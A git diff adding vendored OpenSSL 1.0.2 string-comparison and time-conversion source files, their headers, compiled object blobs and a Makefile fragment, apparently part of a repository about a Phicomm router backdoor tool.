+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <ctype.h>
+#include <e_os.h>
+#include "o_str.h"
+
+#if !defined(OPENSSL_IMPLEMENTS_strncasecmp) && \
+    !defined(OPENSSL_SYSNAME_WIN32) && !defined(OPENSSL_SYSNAME_WINCE) && \
+    !defined(NETWARE_CLIB)
+# include <strings.h>
+#endif
+
+int OPENSSL_strncasecmp(const char *str1, const char *str2, size_t n)
+{
+#if defined(OPENSSL_IMPLEMENTS_strncasecmp)
+    while (*str1 && *str2 && n) {
+        int res = toupper(*str1) - toupper(*str2);
+        if (res)
+            return res < 0 ? -1 : 1;
+        str1++;
+        str2++;
+        n--;
+    }
+    if (n == 0)
+        return 0;
+    if (*str1)
+        return 1;
+    if (*str2)
+        return -1;
+    return 0;
+#else
+    /*
+     * Recursion hazard warning! Whenever strncasecmp is #defined as
+     * OPENSSL_strncasecmp, OPENSSL_IMPLEMENTS_strncasecmp must be defined as
+     * well.
+     */
+    return strncasecmp(str1, str2, n);
+#endif
+}
+
+int OPENSSL_strcasecmp(const char *str1, const char *str2)
+{
+#if defined(OPENSSL_IMPLEMENTS_strncasecmp)
+    return OPENSSL_strncasecmp(str1, str2, (size_t)-1);
+#else
+    return strcasecmp(str1, str2);
+#endif
+}
+
+int OPENSSL_memcmp(const void *v1, const void *v2, size_t n)
+{
+    const unsigned char *c1 = v1, *c2 = v2;
+    int ret = 0;
+
+    while (n && (ret = *c1 - *c2) == 0)
+        n--, c1++, c2++;
+
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_str.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_str.h
new file mode 100644
index 0000000..5313528
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_str.h
@@ -0,0 +1,69 @@
+/* crypto/o_str.h -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Richard Levitte (richard@levitte.org) for the OpenSSL project
+ * 2003.
+ */
+/* ====================================================================
+ * Copyright (c) 2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_O_STR_H
+# define HEADER_O_STR_H
+
+# include <stddef.h>            /* to get size_t */
+
+int OPENSSL_strcasecmp(const char *str1, const char *str2);
+int OPENSSL_strncasecmp(const char *str1, const char *str2, size_t n);
+int OPENSSL_memcmp(const void *p1, const void *p2, size_t n);
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_str.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_str.o
new file mode 100644
index 0000000000000000000000000000000000000000..a9051d52ffa3adb3865baac1cb9a8da86bf2655a
GIT binary patch
literal 1792
zcmbtU-D(p-6h7NT8?|j}@S;$ay%LLdNZNw5f~0N!kkAy<fH$&i*42RBB<xP0^+J6F
zUqJ9FypHrrpTJkpJMm70c+T#e?PlC~p$BHpcfL8_?97>&eO+zV<_rVa40r(N5wif}
z%sDQHundc^06+3Ke}1KS3Y0!Iwm-{4{zEoj!EUKB`B+&S%Wr3;@fp<j_jk<Oo$jbF
zN9MNJ6vg$@y-^sJUTqXbaceE2Y1%BdWo#F))ekx_hf5)jmvap<nep-w7$?id>cV{P
zEpC7`*TWHjOUe^h)Hu>t6lW^`H%GO}!uLs9PA0W-v{qj2v?>$sZknSg0~h}!Lw<e+
zpPRu`)uxSVQAn(lYjXp6s*i40kx1h=k*9fB&;I_5{F=%ypeHlK9=m}RNMAV6I;<YF
z+f9o4jvcs;Hw3HRZ0+qftyZnpt{z!OyL-*5mCWQs7JIHoIyBxn-IXiYeoZ1<qCqs`
z7qKyKA|}K86}B+IZc72?d7ll9=Y4?)PCaRN(Mvz_Jx0EJYzyh0NDxnLX@lqn0SIT{
zd2S!M{y@3{@A!HkZRdrGpZ7;%=nsajFHb>)Gq^qLnQwb8FY&*;iE6sj`i(0iN462U
zxToBttztm6EGJ3CU#MVc{N64jCN1C86&gglg^hUqh4?g>V*2;*Vh+vuulf>dX--}z
z!qE8pcbHI~zt4ULdB(}qcgY}u_1uRzMz30xE6#kckQp-(;QBG$ML=`v`msuQtUNni
z{{#op&M&75+E79|Khm<E&oAxUBw0}#?I}-hklv22Cr&>*q~ML(P=|tqsp(>d{!eN8
NLq#6PnGw+SzX7k7hrR#+

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_time.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_time.c
new file mode 100644
index 0000000..58413fe
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_time.c
@@ -0,0 +1,440 @@
+/* crypto/o_time.c -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Richard Levitte (richard@levitte.org) for the OpenSSL project
+ * 2001.
+ */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2008.
+ */
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <openssl/e_os2.h>
+#include <string.h>
+#include "o_time.h"
+
+#ifdef OPENSSL_SYS_VMS
+# if __CRTL_VER >= 70000000 && \
+     (defined _POSIX_C_SOURCE || !defined _ANSI_C_SOURCE)
+#  define VMS_GMTIME_OK
+# endif
+# ifndef VMS_GMTIME_OK
+#  include <libdtdef.h>
+#  include <lib$routines.h>
+#  include <lnmdef.h>
+#  include <starlet.h>
+#  include <descrip.h>
+#  include <stdlib.h>
+# endif                         /* ndef VMS_GMTIME_OK */
+#endif
+
+struct tm *OPENSSL_gmtime(const time_t *timer, struct tm *result)
+{
+    struct tm *ts = NULL;
+
+#if defined(OPENSSL_THREADS) && !defined(OPENSSL_SYS_WIN32) && !defined(OPENSSL_SYS_OS2) && (!defined(OPENSSL_SYS_VMS) || defined(gmtime_r)) && !defined(OPENSSL_SYS_MACOSX) && !defined(OPENSSL_SYS_SUNOS)
+    /*
+     * should return &data, but doesn't on some systems, so we don't even
+     * look at the return value
+     */
+    gmtime_r(timer, result);
+    ts = result;
+#elif !defined(OPENSSL_SYS_VMS) || defined(VMS_GMTIME_OK)
+    ts = gmtime(timer);
+    if (ts == NULL)
+        return NULL;
+
+    memcpy(result, ts, sizeof(struct tm));
+    ts = result;
+#endif
+#if defined( OPENSSL_SYS_VMS) && !defined( VMS_GMTIME_OK)
+    if (ts == NULL) {
+        static $DESCRIPTOR(tabnam, "LNM$DCL_LOGICAL");
+        static $DESCRIPTOR(lognam, "SYS$TIMEZONE_DIFFERENTIAL");
+        char logvalue[256];
+        unsigned int reslen = 0;
+        struct {
+            short buflen;
+            short code;
+            void *bufaddr;
+            unsigned int *reslen;
+        } itemlist[] = {
+            {
+                0, LNM$_STRING, 0, 0
+            },
+            {
+                0, 0, 0, 0
+            },
+        };
+        int status;
+        time_t t;
+
+        /* Get the value for SYS$TIMEZONE_DIFFERENTIAL */
+        itemlist[0].buflen = sizeof(logvalue);
+        itemlist[0].bufaddr = logvalue;
+        itemlist[0].reslen = &reslen;
+        status = sys$trnlnm(0, &tabnam, &lognam, 0, itemlist);
+        if (!(status & 1))
+            return NULL;
+        logvalue[reslen] = '\0';
+
+        t = *timer;
+
+/* The following is extracted from the DEC C header time.h */
+        /*
+         **  Beginning in OpenVMS Version 7.0 mktime, time, ctime, strftime
+         **  have two implementations.  One implementation is provided
+         **  for compatibility and deals with time in terms of local time,
+         **  the other __utc_* deals with time in terms of UTC.
+         */
+        /*
+         * We use the same conditions as in said time.h to check if we should
+         * assume that t contains local time (and should therefore be
+         * adjusted) or UTC (and should therefore be left untouched).
+         */
+# if __CRTL_VER < 70000000 || defined _VMS_V6_SOURCE
+        /* Get the numerical value of the equivalence string */
+        status = atoi(logvalue);
+
+        /* and use it to move time to GMT */
+        t -= status;
+# endif
+
+        /* then convert the result to the time structure */
+
+        /*
+         * Since there was no gmtime_r() to do this stuff for us, we have to
+         * do it the hard way.
+         */
+        {
+            /*-
+             * The VMS epoch is the astronomical Smithsonian date,
+               if I remember correctly, which is November 17, 1858.
+               Furthermore, time is measure in thenths of microseconds
+               and stored in quadwords (64 bit integers).  unix_epoch
+               below is January 1st 1970 expressed as a VMS time.  The
+               following code was used to get this number:
+
+               #include <stdio.h>
+               #include <stdlib.h>
+               #include <lib$routines.h>
+               #include <starlet.h>
+
+               main()
+               {
+                 unsigned long systime[2];
+                 unsigned short epoch_values[7] =
+                   { 1970, 1, 1, 0, 0, 0, 0 };
+
+                 lib$cvt_vectim(epoch_values, systime);
+
+                 printf("%u %u", systime[0], systime[1]);
+               }
+            */
+            unsigned long unix_epoch[2] = { 1273708544, 8164711 };
+            unsigned long deltatime[2];
+            unsigned long systime[2];
+            struct vms_vectime {
+                short year, month, day, hour, minute, second, centi_second;
+            } time_values;
+            long operation;
+
+            /*
+             * Turn the number of seconds since January 1st 1970 to an
+             * internal delta time. Note that lib$cvt_to_internal_time() will
+             * assume that t is signed, and will therefore break on 32-bit
+             * systems some time in 2038.
+             */
+            operation = LIB$K_DELTA_SECONDS;
+            status = lib$cvt_to_internal_time(&operation, &t, deltatime);
+
+            /*
+             * Add the delta time with the Unix epoch and we have the current
+             * UTC time in internal format
+             */
+            status = lib$add_times(unix_epoch, deltatime, systime);
+
+            /* Turn the internal time into a time vector */
+            status = sys$numtim(&time_values, systime);
+
+            /* Fill in the struct tm with the result */
+            result->tm_sec = time_values.second;
+            result->tm_min = time_values.minute;
+            result->tm_hour = time_values.hour;
+            result->tm_mday = time_values.day;
+            result->tm_mon = time_values.month - 1;
+            result->tm_year = time_values.year - 1900;
+
+            operation = LIB$K_DAY_OF_WEEK;
+            status = lib$cvt_from_internal_time(&operation,
+                                                &result->tm_wday, systime);
+            result->tm_wday %= 7;
+
+            operation = LIB$K_DAY_OF_YEAR;
+            status = lib$cvt_from_internal_time(&operation,
+                                                &result->tm_yday, systime);
+            result->tm_yday--;
+
+            result->tm_isdst = 0; /* There's no way to know... */
+
+            ts = result;
+        }
+    }
+#endif
+    return ts;
+}
+
+/*
+ * Take a tm structure and add an offset to it. This avoids any OS issues
+ * with restricted date types and overflows which cause the year 2038
+ * problem.
+ */
+
+#define SECS_PER_DAY (24 * 60 * 60)
+
+static long date_to_julian(int y, int m, int d);
+static void julian_to_date(long jd, int *y, int *m, int *d);
+static int julian_adj(const struct tm *tm, int off_day, long offset_sec,
+                      long *pday, int *psec);
+
+int OPENSSL_gmtime_adj(struct tm *tm, int off_day, long offset_sec)
+{
+    int time_sec, time_year, time_month, time_day;
+    long time_jd;
+
+    /* Convert time and offset into julian day and seconds */
+    if (!julian_adj(tm, off_day, offset_sec, &time_jd, &time_sec))
+        return 0;
+
+    /* Convert Julian day back to date */
+
+    julian_to_date(time_jd, &time_year, &time_month, &time_day);
+
+    if (time_year < 1900 || time_year > 9999)
+        return 0;
+
+    /* Update tm structure */
+
+    tm->tm_year = time_year - 1900;
+    tm->tm_mon = time_month - 1;
+    tm->tm_mday = time_day;
+
+    tm->tm_hour = time_sec / 3600;
+    tm->tm_min = (time_sec / 60) % 60;
+    tm->tm_sec = time_sec % 60;
+
+    return 1;
+
+}
+
+int OPENSSL_gmtime_diff(int *pday, int *psec,
+                        const struct tm *from, const struct tm *to)
+{
+    int from_sec, to_sec, diff_sec;
+    long from_jd, to_jd, diff_day;
+    if (!julian_adj(from, 0, 0, &from_jd, &from_sec))
+        return 0;
+    if (!julian_adj(to, 0, 0, &to_jd, &to_sec))
+        return 0;
+    diff_day = to_jd - from_jd;
+    diff_sec = to_sec - from_sec;
+    /* Adjust differences so both positive or both negative */
+    if (diff_day > 0 && diff_sec < 0) {
+        diff_day--;
+        diff_sec += SECS_PER_DAY;
+    }
+    if (diff_day < 0 && diff_sec > 0) {
+        diff_day++;
+        diff_sec -= SECS_PER_DAY;
+    }
+
+    if (pday)
+        *pday = (int)diff_day;
+    if (psec)
+        *psec = diff_sec;
+
+    return 1;
+
+}
+
+/* Convert tm structure and offset into julian day and seconds */
+static int julian_adj(const struct tm *tm, int off_day, long offset_sec,
+                      long *pday, int *psec)
+{
+    int offset_hms, offset_day;
+    long time_jd;
+    int time_year, time_month, time_day;
+    /* split offset into days and day seconds */
+    offset_day = offset_sec / SECS_PER_DAY;
+    /* Avoid sign issues with % operator */
+    offset_hms = offset_sec - (offset_day * SECS_PER_DAY);
+    offset_day += off_day;
+    /* Add current time seconds to offset */
+    offset_hms += tm->tm_hour * 3600 + tm->tm_min * 60 + tm->tm_sec;
+    /* Adjust day seconds if overflow */
+    if (offset_hms >= SECS_PER_DAY) {
+        offset_day++;
+        offset_hms -= SECS_PER_DAY;
+    } else if (offset_hms < 0) {
+        offset_day--;
+        offset_hms += SECS_PER_DAY;
+    }
+
+    /*
+     * Convert date of time structure into a Julian day number.
+     */
+
+    time_year = tm->tm_year + 1900;
+    time_month = tm->tm_mon + 1;
+    time_day = tm->tm_mday;
+
+    time_jd = date_to_julian(time_year, time_month, time_day);
+
+    /* Work out Julian day of new date */
+    time_jd += offset_day;
+
+    if (time_jd < 0)
+        return 0;
+
+    *pday = time_jd;
+    *psec = offset_hms;
+    return 1;
+}
+
+/*
+ * Convert date to and from julian day Uses Fliegel & Van Flandern algorithm
+ */
+static long date_to_julian(int y, int m, int d)
+{
+    return (1461 * (y + 4800 + (m - 14) / 12)) / 4 +
+        (367 * (m - 2 - 12 * ((m - 14) / 12))) / 12 -
+        (3 * ((y + 4900 + (m - 14) / 12) / 100)) / 4 + d - 32075;
+}
+
+static void julian_to_date(long jd, int *y, int *m, int *d)
+{
+    long L = jd + 68569;
+    long n = (4 * L) / 146097;
+    long i, j;
+
+    L = L - (146097 * n + 3) / 4;
+    i = (4000 * (L + 1)) / 1461001;
+    L = L - (1461 * i) / 4 + 31;
+    j = (80 * L) / 2447;
+    *d = L - (2447 * j) / 80;
+    L = j / 11;
+    *m = j + 2 - (12 * L);
+    *y = 100 * (n - 49) + i + L;
+}
+
+#ifdef OPENSSL_TIME_TEST
+
+# include <stdio.h>
+
+/*
+ * Time checking test code. Check times are identical for a wide range of
+ * offsets. This should be run on a machine with 64 bit time_t or it will
+ * trigger the very errors the routines fix.
+ */
+
+int main(int argc, char **argv)
+{
+    long offset;
+    for (offset = 0; offset < 1000000; offset++) {
+        check_time(offset);
+        check_time(-offset);
+        check_time(offset * 1000);
+        check_time(-offset * 1000);
+    }
+}
+
+int check_time(long offset)
+{
+    struct tm tm1, tm2, o1;
+    int off_day, off_sec;
+    long toffset;
+    time_t t1, t2;
+    time(&t1);
+    t2 = t1 + offset;
+    OPENSSL_gmtime(&t2, &tm2);
+    OPENSSL_gmtime(&t1, &tm1);
+    o1 = tm1;
+    OPENSSL_gmtime_adj(&tm1, 0, offset);
+    if ((tm1.tm_year != tm2.tm_year) ||
+        (tm1.tm_mon != tm2.tm_mon) ||
+        (tm1.tm_mday != tm2.tm_mday) ||
+        (tm1.tm_hour != tm2.tm_hour) ||
+        (tm1.tm_min != tm2.tm_min) || (tm1.tm_sec != tm2.tm_sec)) {
+        fprintf(stderr, "TIME ERROR!!\n");
+        fprintf(stderr, "Time1: %d/%d/%d, %d:%02d:%02d\n",
+                tm2.tm_mday, tm2.tm_mon + 1, tm2.tm_year + 1900,
+                tm2.tm_hour, tm2.tm_min, tm2.tm_sec);
+        fprintf(stderr, "Time2: %d/%d/%d, %d:%02d:%02d\n",
+                tm1.tm_mday, tm1.tm_mon + 1, tm1.tm_year + 1900,
+                tm1.tm_hour, tm1.tm_min, tm1.tm_sec);
+        return 0;
+    }
+    OPENSSL_gmtime_diff(&o1, &tm1, &off_day, &off_sec);
+    toffset = (long)off_day *SECS_PER_DAY + off_sec;
+    if (offset != toffset) {
+        fprintf(stderr, "TIME OFFSET ERROR!!\n");
+        fprintf(stderr, "Expected %ld, Got %ld (%d:%d)\n",
+                offset, toffset, off_day, off_sec);
+        return 0;
+    }
+    return 1;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_time.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_time.h
new file mode 100644
index 0000000..a83a3d2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_time.h
@@ -0,0 +1,70 @@
+/* crypto/o_time.h -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Richard Levitte (richard@levitte.org) for the OpenSSL project
+ * 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_O_TIME_H
+# define HEADER_O_TIME_H
+
+# include <time.h>
+
+struct tm *OPENSSL_gmtime(const time_t *timer, struct tm *result);
+int OPENSSL_gmtime_adj(struct tm *tm, int offset_day, long offset_sec);
+int OPENSSL_gmtime_diff(int *pday, int *psec,
+                        const struct tm *from, const struct tm *to);
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_time.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/o_time.o
new file mode 100644
index 0000000000000000000000000000000000000000..96111e7c51db07d61f3ebd00ca3772066d3286df
GIT binary patch
literal 2744
zcmb_dO>7fK6rS~NiXrZ@RM1AHfDfih1XyvYgg~gu1UnuVH$dYk2MWfC9b%k6B^x!V
z+CXHCIx<!{^paa8RH;XLK*EhGEdd3JDuk@6KkA|FsS&hNX%K->>b^IgO`OG*dgzmO
z-^}-ZX6AcuXHSQsZ7xM2wkYHcvNE$#LdMsuj9bL8g*;C@gz-BOUZTY_M-)Ok*))ws
z79V$Zr0*c0%w@vbe%e$@cexFn5M@?<i7F*JwR9S+llA2}I&~Kv@9CjjX<}{pHl3Qq
zc`$#{pfes=CqJ~2^*p3sJ}8&Vp+eNR5ac(f>EaW9tulC;u{^X8)XHgV2=<L8I-@}#
z<yQ-5x9ohGkhFEVPFfViE&w)@1efW>Ck3qqL-Ji7+H^Hw1(jP<cMpC*2<s^^<<IeY
z#y4C+IzrqydW^n9k6l|>zjdjD@r8Ln3Cmfg!T4Me4hK~H#Q66MpB@!HEc;tylI6AS
zjlvZ4H3TdM2QZ?ApwBaZ{qJ%)XRSZ`7_IrB&nSMr&qZi)?ZFobD_r`aUIC?D1}kCH
zZ1Hgs&lKSnOIzp|$<7Bt87s-MmMZM5X^s`z6fl3X9z&oCw75NuF|z<71IvEdxos?S
z`!M4-g<phUJy6h$w!&HW$B)Y8fJLVsUED^<yC=Yde(}*-LV`TJF>=GY1Vv!eq0Cng
zidfFb;u0;y6kHUYc$b0s9w~qDum_IhnTBoehi&t)TTc16fbl(oQr@Mp{QJI!B-_1T
zkYv_XIL%&f6bwQu@vl1>f6DlGff8~acnGX|Yq9E%@So?0pCYGYb)kTDFBvF-x8R%q
zij-^fM}*n@h2>*DgYAg<a97$6&Bt=3Nj+yxtYhU{b)p?N05svrS(9#7p528I%l&Su
zypvF|cb5Cnba536hx@M-d1e3JAh)nxu95J81N*#<o!w)D=9qV{f49GRS76VWm<A?a
zYxXz4-c*6H&?s1D10JXs3Ac9=7a<m6Dm*9~D~c%Zy-k#HL)q+E<GuhL+6?$B(smzp
zyKWR*LA~L;8q~e#G^#gd>s;UHUaB{=>PD;XCZqw}4$BxH>X2?^UB}TRZ2i*KieCWJ
zo7KIFu;E%CO4|+8ZMtzD*E*+0bZ=IR=q;{`x)%T{SCY;(6sFe5{c;TxoEfdpin`3k
zYMUz9TaB%QsjDiF;6}Qr<hj+(%XrmgSLLA+Wae2>MYUGrn_&6^tZT0)_yr6#*4HUp
z0H}rU103^gl2nLV0QT0u_#c=4UC=lvqCPkniks<yl)s0Z8tYFd2IGn3DRSs=sJ){j
z8b3LJHWCj<54F;0{7_q4M<^DL(bi}v?r;)u@%X5j=*h%;`ZDp}M7rPUlT7#a;+h~!
z6(uTz_xWFNg`l*{{b6t8<!R%(Y;-5?1s@a)lc8cB6Ymw==6l$I+x(q(;5JXhKRPjB
zCb~hJBNg3ek494c3BQ>dH;F%)FcZYzJvvJKJwpQnsX@R7hs=~8zSUiV6gfXRIOZQ7
z85&NFm=nY=GNk(Ay(0<W`Tr0vB*B(&c5n+|C|m6dqcW}f0xG~}P{?shWxD)6Armr*
z;P->;*qx7e2Fk1OAnsU(9Crff3?kdNGJ*F_crd5a{lCTsAQp4tT~sZ0{Eli6#`gNQ
z#_!4=SG#iOhNRKy`zGLcOH}tFx?Yg+UYt~k&7Tc*!vJ$S<1fkhE4HK5&iG@1*Q(!V
zvVJFI9M%tG?RdL>wbsUvK1>R7Mjp5x#&!<G?Rfa#KT|uj&*P5^WTc{&-%kEEfTb4I
OZh7_E{~kMmGyWg-TG{mg

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/Makefile
new file mode 100644
index 0000000..a8aedbd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/Makefile
@@ -0,0 +1,130 @@
+#
+# OpenSSL/crypto/objects/Makefile
+#
+
+DIR=	objects
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+PERL=		perl
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
